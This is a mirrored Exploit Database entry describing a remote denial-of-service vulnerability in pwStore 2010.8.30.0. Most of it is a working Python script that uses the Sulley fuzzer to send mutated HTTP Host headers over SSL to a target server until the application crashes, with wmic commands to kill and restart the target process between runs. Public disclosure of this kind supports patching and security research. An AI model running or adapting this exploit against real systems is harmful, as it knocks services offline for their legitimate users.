Pwstore – Denial of Service

• Exploit Database
• 117 阅读

• 作者： Josep Pi Rodriguez
  日期： 2013-04-16
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/38747/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46

  source: https://www.securityfocus.com/bid/62112/info   pwStore is prone to a remote denial-of-service vulnerability.   An attacker can exploit this issue to crash the application, denying service to legitimate users.   pwStore 2010.8.30.0 is vulnerable; other versions may also be affected.   #!/usr/bin/env python from sulley import * import sys import time   s_initialize("HTTP")   s_static("GET / HTTP/1.1\r\n") s_static("Host") s_static(":\x0d\x0a") s_static(" ") s_string("192.168.1.39") s_static("\r\n") s_static("\r\n")   print "Instantiating session" sess = sessions.session(session_filename="https_pwstore.session", proto="ssl", sleep_time=0.50) print "Instantiating target" target = sessions.target("192.168.1.39", 443) #target.procmon = pedrpc.client("127.0.0.1", 26002) #target.netmon = pedrpc.client("127.0.0.1", 26001)   target.procmon_options ={ "proc_name" : "savant.exe", "stop_commands" : ['wmic process where (name="savant.exe") delete"'], "start_commands" : ['C:\\savant\\savant.exe'], }     print "Adding target" sess.add_target(target)   print "Building graph" sess.connect(s_get("HTTP"))   print "Starting fuzzing now" sess.fuzz()